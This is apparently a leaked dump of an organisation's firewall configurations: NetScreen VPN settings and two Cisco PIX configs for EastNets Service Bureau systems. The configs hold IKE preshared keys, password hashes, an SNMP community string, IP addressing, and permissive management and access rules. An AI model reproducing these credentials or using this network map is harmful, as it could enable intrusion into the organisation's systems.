+set ike gateway "DEV-DIALIN" dialup "DEV-DIALIN" Aggr outgoing-interface "ethernet0/1" preshare "j8mN+j0DNNG6jAs24YCdzg3uXpnl6nwrEwwKmiL9gPQC+pl6kNx4YV0=" proposal "pre-g2-3des-sha"
+set ike gateway "DEV-DIALIN" nat-traversal udp-checksum
+set ike gateway "DEV-DIALIN" nat-traversal keepalive-frequency 5
+set ike gateway "DEV-DIALIN" xauth
+unset ike gateway "DEV-DIALIN" xauth do-edipi-auth
+set ike gateway "ENIT_Tunnel" address 80.227.254.250 Main outgoing-interface "ethernet0/1" preshare "q9Wk+sA1N8yaOGs5u5CSY1ItaEni2Df3Tg==" proposal "pre-g2-3des-sha"
+set ike respond-bad-spi 1
+set ike ikev2 ike-sa-soft-lifetime 60
+unset ike ikeid-enumeration
+unset ike dos-protection
+unset ipsec access-session enable
+set ipsec access-session maximum 5000
+set ipsec access-session upper-threshold 0
+set ipsec access-session lower-threshold 0
+set ipsec access-session dead-p2-sa-timeout 0
+unset ipsec access-session log-error
+unset ipsec access-session info-exch-connected
+unset ipsec access-session use-error-log
+set vpn "MGMT-DIALIN" gateway "MGMT-DIALIN" replay tunnel idletime 0 proposal "g2-esp-3des-sha" 
+set vpn "MGMT-DIALIN" monitor
+set vpn "APP-DIALIN" gateway "APP-DIALIN" replay tunnel idletime 0 proposal "g2-esp-3des-sha" 
+set vpn "APP-DIALIN" monitor
+set vpn "Singtel-Users-Dialup" gateway "Singtel-Users-Dialup" replay tunnel idletime 0 proposal "g2-esp-3des-sha" 
+set vpn "Singtel-Support-Dialup" gateway "Singtel-Support-Dialup" replay tunnel idletime 0 proposal "g2-esp-3des-sha" 
+set vpn "ENSB-TELEPIN-UAT-LL" gateway "ENSB-TELEPIN-UAT-LL" replay tunnel idletime 0 proposal "g2-esp-3des-sha" 
+set vpn "ENSB-TELEPIN-UAT-LL" monitor optimized rekey
+set vpn "ENSB-TELEPIN-UAT-LL" id 0xe bind interface tunnel.18
+set interface tunnel.18 nhtb 7.7.7.7 vpn "ENSB-TELEPIN-UAT-LL"
+set vpn "DEV-DIALIN" gateway "DEV-DIALIN" replay tunnel idletime 0 proposal "g2-esp-3des-sha" 
+set vpn "ENIT_VPN" gateway "ENIT_Tunnel" replay tunnel idletime 0 proposal "g2-esp-3des-sha" 
+set vpn "ENIT_VPN" monitor optimized rekey
+set attack db server "https://services.netscreen.com/restricted/sigupdates"
+set attack db mode Update
+set attack db schedule daily 00:00
+set url protocol websense
+exit
+set vpn "ENSB-TELEPIN-UAT-LL" proxy-id check
+set vpn "ENSB-TELEPIN-UAT-LL" proxy-id local-ip 192.168.120.0/24 remote-ip 202.40.237.144/28 "ANY" 
+set policy id 46 from "Trust" to "Untrust"  "ENSWDUAT-SRV1" "TELEPIN-FTP" "ANY" permit log 
+set policy id 46
+set dst-address "TELEPIN-SINGTEL-SRV1"
+set dst-address "TELEPIN-SINGTEL-SRV2"
+set dst-address "TELEPIN-SINGTEL-SRV3"
+set dst-address "TELEPIN-SINGTEL-SRV4"
+set log session-init
+exit
+set policy id 35 from "Untrust" to "Trust"  "Any" "VIP(80.227.254.232)" "HTTPS" permit log 
+set policy id 35
+set log session-init
+exit
+set policy id 34 from "Trust" to "Untrust"  "ENSBDSW-NW" "Dial-Up VPN" "ANY" tunnel vpn "APP-DIALIN" id 0x4 pair-policy 33 log 
+set policy id 34
+set log session-init
+exit
+set policy id 33 from "Untrust" to "Trust"  "Dial-Up VPN" "ENSBDSW-NW" "ANY" tunnel vpn "APP-DIALIN" id 0x4 pair-policy 34 log 
+set policy id 33
+set log session-init
+exit
+set policy id 32 from "Trust" to "Untrust"  "ENSBDSW-NW" "Dial-Up VPN" "ANY" tunnel vpn "MGMT-DIALIN" id 0x3 pair-policy 31 log 
+set policy id 32
+set log session-init
+exit
+set policy id 41 from "Trust" to "Untrust"  "ENSWDUAT-SRV1" "Dial-Up VPN" "ANY" tunnel vpn "Singtel-Users-Dialup" id 0x9 pair-policy 39 log 
+set policy id 41
+set log session-init
+exit
+set policy id 49 from "Trust" to "Untrust"  "ENSWDUAT-SRV1" "ENIT-Server01" "ANY" tunnel vpn "ENIT_VPN" id 0x10 pair-policy 50 log 
+set policy id 49
+set log session-init
+exit
+set policy id 31 from "Untrust" to "Trust"  "Dial-Up VPN" "ENSBDSW-NW" "ANY" tunnel vpn "MGMT-DIALIN" id 0x3 pair-policy 32 log 
+set policy id 31
+set log session-init
+exit
+set policy id 30 from "Trust" to "Untrust"  "Any" "Any" "ANY" nat src permit log 
+set policy id 30
+set log session-init
+exit
+set policy id 36 from "Untrust" to "MGMT"  "Any" "VIP(80.227.254.232)" "HP-OA-1443" permit log 
+set policy id 36
+set log session-init
+exit
+set policy id 37 from "Untrust" to "MGMT"  "Dial-Up VPN" "MGMT-NW" "ANY" tunnel vpn "MGMT-DIALIN" id 0x6 pair-policy 38 log 
+set policy id 37
+set log session-init
+exit
+set policy id 38 from "MGMT" to "Untrust"  "MGMT-NW" "Dial-Up VPN" "ANY" tunnel vpn "MGMT-DIALIN" id 0x6 pair-policy 37 log 
+set policy id 38
+set log session-init
+exit
+set policy id 39 from "Untrust" to "Trust"  "Dial-Up VPN" "ENSWDUAT-SRV1" "SINGTEL-USER-PORTS" tunnel vpn "Singtel-Users-Dialup" id 0x9 pair-policy 41 log 
+set policy id 39
+set log session-init
+exit
+set policy id 44 from "Untrust" to "Trust"  "Dial-Up VPN" "ENSWDUAT-SRV1" "SWAAS-SUPPORT-PORTS" tunnel vpn "Singtel-Support-Dialup" id 0xd log 
+set policy id 44
+set log session-init
+exit
+set policy id 45 from "Untrust" to "Trust"  "TELEPIN-FTP" "ENSWDUAT-SRV1" "SINGTEL-USER-PORTS" permit log 
+set policy id 45
+set src-address "TELEPIN-SINGTEL-SRV1"
+set src-address "TELEPIN-SINGTEL-SRV2"
+set src-address "TELEPIN-SINGTEL-SRV3"
+set src-address "TELEPIN-SINGTEL-SRV4"
+set log session-init
+exit
+set policy id 47 from "Untrust" to "Trust"  "Dial-Up VPN" "ENSBDSW-NW" "ANY" tunnel vpn "DEV-DIALIN" id 0xf pair-policy 48 log 
+set policy id 47
+set log session-init
+exit
+set policy id 48 from "Trust" to "Untrust"  "ENSBDSW-NW" "Dial-Up VPN" "ANY" tunnel vpn "DEV-DIALIN" id 0xf pair-policy 47 log 
+set policy id 48
+set log session-init
+exit
+set policy id 50 from "Untrust" to "Trust"  "ENIT-Server01" "ENSWDUAT-SRV1" "ANY" tunnel vpn "ENIT_VPN" id 0x10 pair-policy 49 log 
+set policy id 50
+set log session-init
+exit
+set nsmgmt bulkcli reboot-timeout 60
+set ssh version v2
+set ssh enable
+set config lock timeout 5
+unset license-key auto-update
+set telnet client enable
+set ssl port 2443
+set snmp port listen 161
+set snmp port trap 162
+set snmpv3 local-engine id "JN118F8A1ADA"
+set vrouter "untrust-vr"
+exit
+set vrouter "trust-vr"
+set source-routing enable
+set max-ecmp-routes 2
+unset add-default-route
+set route 192.168.150.224/27 interface ethernet0/0 gateway 192.168.150.3 description "ROUTE - TEST & STAGING NW"
+set route 172.20.0.0/24 interface ethernet0/2 gateway 172.20.0.9 description "ROUTE TO SITE VPN THRU MPLS"
+set route 10.160.0.0/19 interface null metric 20 description "ROUTE TO NULL"
+set route 172.20.0.0/24 interface null metric 20 description "ROUTE TO NULL"
+set route 0.0.0.0/0 interface ethernet3/0 gateway 80.227.254.193 metric 2 description "DEFAULT ROUTE - INTERNET1 GW1"
+set route 0.0.0.0/0 interface ethernet0/1 gateway 80.227.254.225 metric 2 description "DEFAULT ROUTE - INTERNET2 GW1"
+set route 192.168.155.0/24 interface ethernet0/0 gateway 192.168.150.1 description "ROUTE TO iSCSIP-NW"
+set route 202.40.237.144/28 interface tunnel.18 gateway 7.7.7.7 description "TELEPIN-UAT-LL"
+set route 202.40.237.153/32 interface tunnel.18 gateway 7.7.7.7 description "TELEPIN-FTP"
+set match-group name Internet1
+set action-group name Internet1
+set action-group Internet1 next-interface ethernet3/0 action-entry 1
+set pbr policy name Internet1
+set pbr policy Internet1 match-group Internet1 action-group Internet1 1
+exit
+set interface ethernet0/0 pbr Internet1
+set vrouter "untrust-vr"
+exit
+set vrouter "trust-vr"
+exit

swift/00711_0_ensbdfw3-2013sep06

@@ -0,0 +1,372 @@
+: Saved
+: Written by enable_15 at 10:01:50.265 UTC Thu Sep 5 2013
+PIX Version 6.3(5)
+interface ethernet0 100full
+interface ethernet1 100full
+interface ethernet2 100full
+interface ethernet3 100full
+interface ethernet4 100full
+interface ethernet5 100full
+nameif ethernet0 clients security10
+nameif ethernet1 paygate security80
+nameif ethernet2 host security90
+nameif ethernet3 dmz security70
+nameif ethernet4 smartstream security20
+nameif ethernet5 mgmt security95
+enable password Ro5XpDeSuehPBEdi encrypted
+passwd Ro5XpDeSuehPBEdi encrypted
+hostname ENSBDPIX3
+domain-name ciscopix.com
+fixup protocol dns maximum-length 512
+fixup protocol ftp 21
+fixup protocol h323 h225 1720
+fixup protocol h323 ras 1718-1719
+fixup protocol http 80
+fixup protocol rsh 514
+fixup protocol rtsp 554
+fixup protocol sip 5060
+fixup protocol sip udp 5060
+fixup protocol skinny 2000
+fixup protocol smtp 25
+fixup protocol sqlnet 1521
+fixup protocol tftp 69
+names
+name 192.168.201.207 pg-qtel
+name 192.168.201.205 pg-dgcx
+name 192.168.201.201 pg-arcapita
+name 192.168.218.209 endssdb1
+name 192.168.218.208 endssapp1
+name 10.155.0.0 ss-client-nw
+name 192.168.200.166 ensbdnbcr2
+name 192.168.200.165 ensbdnbcr1
+name 10.149.7.0 pg-sslvpn-nw
+name 10.149.3.0 fmhs-sslvpn-nw
+name 10.149.11.0 nw-sslvpn-nw
+name 10.149.13.0 ins-sslvpn-nw
+name 192.168.200.104 sl3
+name 192.168.200.245 ftp
+name 192.168.203.215 ensbdtasw1
+name 10.153.4.64 qfqf-gnat-nw
+name 192.168.208.10 ensbdmgmt1
+name 192.168.208.11 ensbdmgmt2
+object-group network smartstream-srv-group 
+  network-object endssapp1 255.255.255.255 
+  network-object endssdb1 255.255.255.255 
+object-group service ss-services tcp 
+  port-object eq 10000 
+  port-object eq ftp 
+  port-object eq 30003 
+access-list dmz_access_in permit ip any any 
+access-list dmz_access_in permit icmp any any 
+access-list dmz_access_in remark To be removed after the activiation
+access-list dmz_access_in permit ip host ensbdtasw1 any 
+access-list dmz_access_in remark To be removed after the activiation
+access-list dmz_access_in permit icmp host ensbdtasw1 any 
+access-list paygate_access_in permit ip any any 
+access-list paygate_access_in permit icmp any any 
+access-list clients_access_in permit tcp nw-sslvpn-nw 255.255.255.0 host 192.168.206.208 object-group ss-services 
+access-list clients_access_in permit tcp ins-sslvpn-nw 255.255.255.0 host 192.168.206.208 object-group ss-services 
+access-list clients_access_in permit tcp ss-client-nw 255.255.0.0 host 192.168.206.208 object-group ss-services 
+access-list clients_access_in permit icmp any any 
+access-list clients_access_in permit tcp any any eq www 
+access-list clients_access_in permit tcp any any eq https 
+access-list clients_access_in remark 
+access-list clients_access_in permit tcp 10.71.0.0 255.255.0.0 any eq 3389 
+access-list clients_access_in remark 
+access-list clients_access_in permit tcp 10.72.0.0 255.255.0.0 any eq 3389 
+access-list clients_access_in permit tcp 10.149.0.0 255.255.0.0 any eq 3389 
+access-list clients_access_in remark ACCESS FROM OLD CAGE - KXB 21JULY2010
+access-list clients_access_in permit ip 192.168.106.0 255.255.254.0 any 
+access-list clients_access_in permit tcp qfqf-gnat-nw 255.255.255.192 host 192.168.206.230 eq www 
+access-list host_access_in permit icmp any any 
+access-list host_access_in permit ip any any 
+access-list smartstream_access_in permit ip any any 
+access-list smartstream_access_in permit icmp any any 
+access-list mgmt_access_in permit ip any any 
+access-list mgmt_access_in permit icmp any any 
+pager lines 20
+logging history informational
+mtu clients 1500
+mtu paygate 1500
+mtu host 1500
+mtu dmz 1500
+mtu smartstream 1500
+mtu mgmt 1500
+ip address clients 192.168.206.3 255.255.255.0
+ip address paygate 192.168.201.3 255.255.255.0
+ip address host 192.168.200.3 255.255.255.0
+ip address dmz 192.168.203.3 255.255.255.0
+ip address smartstream 192.168.218.3 255.255.255.0
+ip address mgmt 192.168.208.3 255.255.255.0
+ip audit info action alarm
+ip audit attack action alarm
+failover
+failover timeout 0:00:00
+failover poll 15
+failover ip address clients 192.168.206.252
+failover ip address paygate 192.168.201.252
+failover ip address host 192.168.200.252
+failover ip address dmz 192.168.203.252
+failover ip address smartstream 192.168.218.252
+failover ip address mgmt 192.168.208.252
+pdm location 0.0.0.0 0.0.0.0 host
+pdm location 192.168.200.33 255.255.255.255 host
+pdm location 192.168.200.34 255.255.255.255 host
+pdm location 192.168.200.59 255.255.255.255 host
+pdm location 192.168.200.62 255.255.255.255 host
+pdm location pg-arcapita 255.255.255.255 paygate
+pdm location 192.168.201.203 255.255.255.255 paygate
+pdm location pg-dgcx 255.255.255.255 paygate
+pdm location 192.168.200.35 255.255.255.255 paygate
+pdm location 192.168.200.201 255.255.255.255 host
+pdm location 192.168.201.35 255.255.255.255 paygate
+pdm location 192.168.200.203 255.255.255.255 host
+pdm location 192.168.200.205 255.255.255.255 host
+pdm location 192.168.203.201 255.255.255.255 dmz
+pdm location 192.168.206.201 255.255.255.255 clients
+pdm location 192.168.206.203 255.255.255.255 clients
+pdm location 192.168.206.205 255.255.255.255 clients
+pdm location 192.168.201.110 255.255.255.255 paygate
+pdm location 192.168.202.249 255.255.255.255 host
+pdm location 192.168.202.249 255.255.255.255 paygate
+pdm location 192.168.202.249 255.255.255.255 dmz
+pdm location 192.168.202.249 255.255.255.255 clients
+pdm location 192.168.206.220 255.255.255.255 clients
+pdm location 192.168.206.225 255.255.255.255 clients
+pdm location 192.168.203.220 255.255.255.255 dmz
+pdm location 192.168.203.225 255.255.255.255 dmz
+pdm location 192.168.200.51 255.255.255.255 host
+pdm location 192.168.200.71 255.255.255.255 host
+pdm location pg-qtel 255.255.255.255 paygate
+pdm location 192.168.200.207 255.255.255.255 host
+pdm location 192.168.206.207 255.255.255.255 clients
+pdm location 192.168.200.25 255.255.255.255 host
+pdm location 192.168.200.20 255.255.255.255 host
+pdm location 10.72.110.0 255.255.255.0 clients
+pdm location 192.168.203.230 255.255.255.255 dmz
+pdm location 192.168.200.22 255.255.255.255 host
+pdm location 0.0.0.0 255.0.0.0 clients
+pdm location 10.71.120.0 255.255.255.0 clients
+pdm location 192.168.203.0 255.255.255.0 dmz
+pdm location 192.168.200.72 255.255.255.255 host
+pdm location 192.168.203.235 255.255.255.255 dmz
+pdm location 192.168.200.52 255.255.255.255 host
+pdm location 192.168.200.95 255.255.255.255 host
+pdm location 192.168.200.96 255.255.255.255 host
+pdm location 192.168.206.235 255.255.255.255 clients
+pdm location 192.168.201.111 255.255.255.255 paygate
+pdm location 192.168.201.112 255.255.255.255 paygate
+pdm location 192.168.200.35 255.255.255.255 host
+pdm location 192.168.200.10 255.255.255.255 host
+pdm location 192.168.200.11 255.255.255.255 host
+pdm location 192.168.200.11 255.255.255.255 dmz
+pdm location 192.168.203.110 255.255.255.255 dmz
+pdm location 192.168.203.111 255.255.255.255 dmz
+pdm location nw-sslvpn-nw 255.255.255.0 clients
+pdm location 10.154.0.0 255.255.0.0 clients
+pdm location pg-sslvpn-nw 255.255.255.0 clients
+pdm location 10.153.2.0 255.255.255.192 clients
+pdm location endssdb1 255.255.255.255 smartstream
+pdm location endssapp1 255.255.255.255 smartstream
+pdm location ins-sslvpn-nw 255.255.255.0 clients
+pdm location 10.149.0.0 255.255.0.0 clients
+pdm location ss-client-nw 255.255.0.0 clients
+pdm location 10.71.0.0 255.255.0.0 clients
+pdm location 10.72.0.0 255.255.0.0 clients
+pdm location 10.153.0.64 255.255.255.192 clients
+pdm location ensbdnbcr1 255.255.255.255 host
+pdm location ensbdnbcr2 255.255.255.255 host
+pdm location fmhs-sslvpn-nw 255.255.255.0 clients
+pdm location sl3 255.255.255.255 host
+pdm location 192.168.219.0 255.255.255.0 host
+pdm location 10.154.9.128 255.255.255.192 clients
+pdm location ftp 255.255.255.255 host
+pdm location 192.168.211.0 255.255.255.0 clients
+pdm location 172.28.0.0 255.255.0.0 host
+pdm location 192.168.200.208 255.255.255.255 host
+pdm location 192.168.209.0 255.255.255.0 host
+pdm location 192.168.200.32 255.255.255.255 host
+pdm location 192.168.200.4 255.255.255.255 host
+pdm location 192.168.200.100 255.255.255.255 host
+pdm location 192.168.211.0 255.255.255.0 host
+pdm location 192.168.200.15 255.255.255.255 host
+pdm location 192.168.211.15 255.255.255.255 host
+pdm location 192.168.200.17 255.255.255.255 host
+pdm location 192.168.202.249 255.255.255.255 mgmt
+pdm location 192.168.106.0 255.255.254.0 clients
+pdm location ensbdtasw1 255.255.255.255 dmz
+pdm location 10.149.105.201 255.255.255.255 clients
+pdm location 10.149.105.202 255.255.255.255 clients
+pdm location 10.149.105.203 255.255.255.255 clients
+pdm location 192.168.203.113 255.255.255.255 dmz
+pdm location 192.168.203.114 255.255.255.255 dmz
+pdm location 10.15.0.0 255.255.255.0 clients
+pdm location 10.14.0.0 255.255.255.0 clients
+pdm location 10.31.5.130 255.255.255.255 clients
+pdm location 10.33.10.202 255.255.255.255 clients
+pdm location 10.33.14.0 255.255.255.0 clients
+pdm location 10.40.5.32 255.255.255.255 clients
+pdm location 10.40.5.63 255.255.255.255 clients
+pdm location 10.40.6.0 255.255.255.0 clients
+pdm location 10.40.14.201 255.255.255.255 clients
+pdm location 10.41.5.32 255.255.255.255 clients
+pdm location 10.41.6.1 255.255.255.255 clients
+pdm location qfqf-gnat-nw 255.255.255.192 clients
+pdm location 0.0.0.0 255.255.255.255 mgmt
+pdm location ensbdmgmt1 255.255.255.255 mgmt
+pdm location ensbdmgmt2 255.255.255.255 mgmt
+pdm location ensbdmgmt2 255.255.255.255 host
+pdm group smartstream-srv-group smartstream
+pdm logging informational 100
+pdm history enable
+arp timeout 14400
+nat (host) 0 192.168.211.15 255.255.255.255 0 0
+static (dmz,host) 192.168.200.220 192.168.203.220 netmask 255.255.255.255 0 0 
+static (dmz,host) 192.168.200.225 192.168.203.225 netmask 255.255.255.255 0 0 
+static (dmz,host) 192.168.200.235 192.168.203.235 netmask 255.255.255.255 0 0 
+static (dmz,host) 192.168.200.230 192.168.203.230 netmask 255.255.255.255 0 0 
+static (paygate,dmz) 192.168.203.201 pg-arcapita netmask 255.255.255.255 0 0 
+static (paygate,dmz) 192.168.203.203 192.168.201.203 netmask 255.255.255.255 0 0 
+static (paygate,dmz) 192.168.203.205 pg-dgcx netmask 255.255.255.255 0 0 
+static (paygate,dmz) 192.168.203.207 pg-qtel netmask 255.255.255.255 0 0 
+static (paygate,host) 192.168.208.12 192.168.201.112 netmask 255.255.255.255 0 0 
+static (paygate,host) 192.168.200.35 192.168.201.35 netmask 255.255.255.255 0 0 
+static (host,paygate) pg-arcapita 192.168.200.201 netmask 255.255.255.255 0 0 
+static (paygate,clients) 192.168.206.201 pg-arcapita netmask 255.255.255.255 0 0 
+static (paygate,clients) 192.168.206.203 192.168.201.203 netmask 255.255.255.255 0 0 
+static (paygate,clients) 192.168.206.205 pg-dgcx netmask 255.255.255.255 0 0 
+static (paygate,clients) 192.168.206.207 pg-qtel netmask 255.255.255.255 0 0 
+static (paygate,host) 192.168.200.201 pg-arcapita netmask 255.255.255.255 0 0 
+static (paygate,host) 192.168.200.203 192.168.201.203 netmask 255.255.255.255 0 0 
+static (paygate,host) 192.168.200.205 pg-dgcx netmask 255.255.255.255 0 0 
+static (paygate,host) 192.168.200.207 pg-qtel netmask 255.255.255.255 0 0 
+static (dmz,clients) 192.168.206.220 192.168.203.220 netmask 255.255.255.255 0 0 
+static (dmz,clients) 192.168.206.225 192.168.203.225 netmask 255.255.255.255 0 0 
+static (dmz,clients) 192.168.206.230 192.168.203.230 netmask 255.255.255.255 0 0 
+static (dmz,clients) 192.168.206.235 192.168.203.235 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.35 192.168.200.35 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.59 192.168.200.59 netmask 255.255.255.255 0 0 
+static (host,paygate) 192.168.201.71 192.168.200.71 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.33 192.168.200.33 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.34 192.168.200.34 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.71 192.168.200.71 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.20 192.168.200.20 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.22 192.168.200.22 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.25 192.168.200.25 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.72 192.168.200.72 netmask 255.255.255.255 0 0 
+static (host,paygate) 192.168.201.72 192.168.200.72 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.95 192.168.200.95 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.96 192.168.200.96 netmask 255.255.255.255 0 0 
+static (paygate,host) 192.168.200.10 192.168.201.110 netmask 255.255.255.255 0 0 
+static (paygate,host) 192.168.200.11 192.168.201.111 netmask 255.255.255.255 0 0 
+static (host,paygate) 192.168.201.111 192.168.200.11 netmask 255.255.255.255 0 0 
+static (host,paygate) 192.168.201.110 192.168.200.10 netmask 255.255.255.255 0 0 
+static (dmz,host) 192.168.203.111 192.168.200.11 netmask 255.255.255.255 0 0 
+static (dmz,host) 192.168.200.10 192.168.203.110 netmask 255.255.255.255 0 0 
+static (dmz,host) 192.168.200.11 192.168.203.111 netmask 255.255.255.255 0 0 
+static (dmz,host) 192.168.200.13 192.168.203.113 netmask 255.255.255.255 0 0 
+static (dmz,host) 192.168.200.14 192.168.203.114 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.110 192.168.200.10 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.111 192.168.200.11 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.53 192.168.200.51 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.51 192.168.200.52 netmask 255.255.255.255 0 0 
+static (smartstream,clients) 192.168.206.208 endssapp1 netmask 255.255.255.255 0 0 
+static (host,smartstream) 192.168.218.53 192.168.200.51 netmask 255.255.255.255 0 0 
+static (dmz,smartstream) 192.168.218.230 192.168.203.230 netmask 255.255.255.255 0 0 
+static (smartstream,clients) 192.168.206.209 endssdb1 netmask 255.255.255.255 0 0 
+static (smartstream,host) 192.168.200.209 endssdb1 netmask 255.255.255.255 0 0 
+static (smartstream,host) 192.168.200.208 endssapp1 netmask 255.255.255.255 0 0 
+static (host,smartstream) 192.168.218.110 192.168.200.10 netmask 255.255.255.255 0 0 
+static (host,smartstream) 192.168.218.165 ensbdnbcr1 netmask 255.255.255.255 0 0 
+static (host,smartstream) 192.168.218.166 ensbdnbcr2 netmask 255.255.255.255 0 0 
+static (host,paygate) 192.168.201.104 sl3 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.245 ftp netmask 255.255.255.255 0 0 
+static (host,smartstream) endssapp1 192.168.200.208 netmask 255.255.255.255 0 0 
+static (host,smartstream) 192.168.218.32 192.168.200.32 netmask 255.255.255.255 0 0 
+static (host,smartstream) 192.168.218.25 192.168.200.25 netmask 255.255.255.255 0 0 
+static (host,smartstream) 192.168.218.4 192.168.200.4 netmask 255.255.255.255 0 0 
+static (host,smartstream) 192.168.218.15 192.168.200.15 netmask 255.255.255.255 0 0 
+static (host,smartstream) 192.168.218.17 192.168.200.17 netmask 255.255.255.255 0 0 
+static (dmz,clients) 192.168.206.215 ensbdtasw1 netmask 255.255.255.255 0 0 
+static (host,smartstream) 192.168.218.51 192.168.200.52 netmask 255.255.255.255 0 0 
+static (mgmt,smartstream) 192.168.218.10 ensbdmgmt1 netmask 255.255.255.255 0 0 
+static (mgmt,smartstream) 192.168.218.11 ensbdmgmt2 netmask 255.255.255.255 0 0 
+static (host,smartstream) 192.168.218.111 192.168.200.11 netmask 255.255.255.255 0 0 
+access-group clients_access_in in interface clients
+access-group paygate_access_in in interface paygate
+access-group host_access_in in interface host
+access-group dmz_access_in in interface dmz
+access-group smartstream_access_in in interface smartstream
+access-group mgmt_access_in in interface mgmt
+route clients 0.0.0.0 0.0.0.0 192.168.206.4 1
+route clients 0.0.0.0 0.0.0.0 192.168.206.5 15
+route clients 10.14.0.0 255.255.255.0 192.168.206.5 2
+route clients 10.15.0.0 255.255.255.0 192.168.206.5 2
+route clients 10.31.5.130 255.255.255.255 192.168.206.5 2
+route clients 10.33.10.202 255.255.255.255 192.168.206.5 2
+route clients 10.33.14.0 255.255.255.0 192.168.206.5 2
+route clients 10.40.5.32 255.255.255.255 192.168.206.5 2
+route clients 10.40.5.63 255.255.255.255 192.168.206.5 2
+route clients 10.40.6.0 255.255.255.0 192.168.206.5 2
+route clients 10.40.14.201 255.255.255.255 192.168.206.5 2
+route clients 10.41.5.32 255.255.255.255 192.168.206.5 2
+route clients 10.41.6.1 255.255.255.255 192.168.206.5 2
+route clients 10.71.120.0 255.255.255.0 192.168.206.27 1
+route clients 10.72.110.0 255.255.255.0 192.168.206.6 1
+route clients 10.72.110.0 255.255.255.0 192.168.206.27 10
+route clients 10.149.0.0 255.255.0.0 192.168.206.7 2
+route clients 10.153.0.64 255.255.255.192 192.168.206.4 1
+route clients 10.153.2.0 255.255.255.192 192.168.206.4 1
+route clients 10.154.0.0 255.255.0.0 192.168.206.4 2
+route clients 10.154.9.128 255.255.255.192 192.168.206.4 1
+route host 172.28.0.0 255.255.0.0 192.168.200.1 2
+route clients 192.168.106.0 255.255.254.0 192.168.206.4 2
+route host 192.168.209.0 255.255.255.0 192.168.200.1 2
+route host 192.168.211.0 255.255.255.0 192.168.200.1 2
+route host 192.168.211.15 255.255.255.255 192.168.200.1 1
+route host 192.168.219.0 255.255.255.0 192.168.200.1 1
+timeout xlate 3:00:00
+timeout conn 1:00:00 half-closed 0:10:00 udp 0:02:00 rpc 0:10:00 h225 1:00:00
+timeout h323 0:05:00 mgcp 0:05:00 sip 0:30:00 sip_media 0:02:00
+timeout sip-disconnect 0:02:00 sip-invite 0:03:00
+timeout uauth 0:05:00 absolute
+aaa-server TACACS+ protocol tacacs+ 
+aaa-server TACACS+ max-failed-attempts 3 
+aaa-server TACACS+ deadtime 10 
+aaa-server RADIUS protocol radius 
+aaa-server RADIUS max-failed-attempts 3 
+aaa-server RADIUS deadtime 10 
+aaa-server LOCAL protocol local 
+http server enable
+http 0.0.0.0 0.0.0.0 clients
+http 192.168.201.110 255.255.255.255 paygate
+http 0.0.0.0 0.0.0.0 paygate
+http 0.0.0.0 0.0.0.0 host
+http 0.0.0.0 0.0.0.0 dmz
+http 192.168.208.0 255.255.255.0 mgmt
+snmp-server host mgmt ensbdmgmt2
+no snmp-server location
+no snmp-server contact
+snmp-server community ^enSBSXstr1ng^
+snmp-server enable traps
+tftp-server mgmt ensbdmgmt1 /
+floodguard enable
+telnet 192.168.202.249 255.255.255.255 clients
+telnet 0.0.0.0 0.0.0.0 paygate
+telnet 192.168.202.249 255.255.255.255 paygate
+telnet 0.0.0.0 0.0.0.0 host
+telnet 192.168.202.249 255.255.255.255 host
+telnet 192.168.202.249 255.255.255.255 dmz
+telnet 0.0.0.0 0.0.0.0 mgmt
+telnet timeout 5
+ssh timeout 5
+console timeout 0
+terminal width 80
+banner login EastNets Service Bureau
+banner login NOTICE TO USERS
+banner login This computer is a property of EastNets (R). Any or all use of this system is governed by the Security Policies of EastNets Service Bureau (ENSB).
+banner login Any or all uses of this system, and all files on this system may be monitored, recorded, audited, or inspected  at the discretion of EastNets Management.
+banner login Unauthorized or improper use of this system may result in administrative disciplinary action and civil and criminal penalties. By continuing to use this system you indicate your awareness of and consent to these terms and conditions of use. LOG OFF IMMEDIATELY if you do not agree to the conditions stated in this warning.
+banner login Please contact ENSB Infrastructure Team to obtain a copy of the Security Policy or visit ENSB portal at http://entranet.eastnets.com/sites/ENSB/.
+Cryptochecksum:81a3d0a8ba7c3afa7d90a8b63f00e307
+: end

swift/00713_0_ensbdfw4-2013sep06

@@ -0,0 +1,933 @@
+: Saved
+: Written by enable_15 at 05:59:45.713 UTC Fri Sep 6 2013
+!
+PIX Version 8.0(2) 
+!
+hostname ENSBUSPIX
+domain-name sag
+enable password Ro5XpDeSuehPBEdi encrypted
+names
+name 192.168.202.20 sag-srv2
+name 192.168.211.17 vpn1-2-nsrp
+name 192.168.211.16 vpn2-int
+name 192.168.211.15 vpn1-int
+name 172.28.0.70 FEBKUS6L-LA-ws2
+name 172.28.0.71 FEBKUS6L-LA-ws3
+name 172.28.0.72 FEBKUS6L-LA-ws4
+name 172.28.0.73 FEBKUS6L-LA-ws5
+name 172.28.0.74 FEBKUS6L-LA-ws6
+name 172.28.0.199 FEBKUS6L-IR-ws3
+name 172.28.0.200 FEBKUS6L-IR-ws4
+name 172.28.0.201 FEBKUS6L-IR-ws5
+name 172.28.0.202 FEBKUS6L-IR-ws6
+name 172.28.0.203 FEBKUS6L-IR-ws7
+name 10.100.200.0 ensb-mgmt-nw
+name 192.168.211.0 ensb-dxb-nw
+name 192.168.211.50 host-srv1
+name 192.168.211.51 host-srv2
+name 192.168.211.52 host-srv3
+name 172.28.0.197 FEBKUS6L-IR-ws1
+name 172.28.0.198 FEBKUS6L-IR-ws2
+name 172.28.0.69 FEBKUS6L-LA-ws1
+name 172.28.0.75 FEBKUS6L-LA-ws7
+name 192.168.111.0 ensb-us-nw description US Network
+name 192.168.213.201 unirisx-srv1
+name 10.100.205.0 unirisx-mgmt-nw
+name 192.168.213.202 unirisx-srv2
+name 192.168.213.203 unirisx-srv3
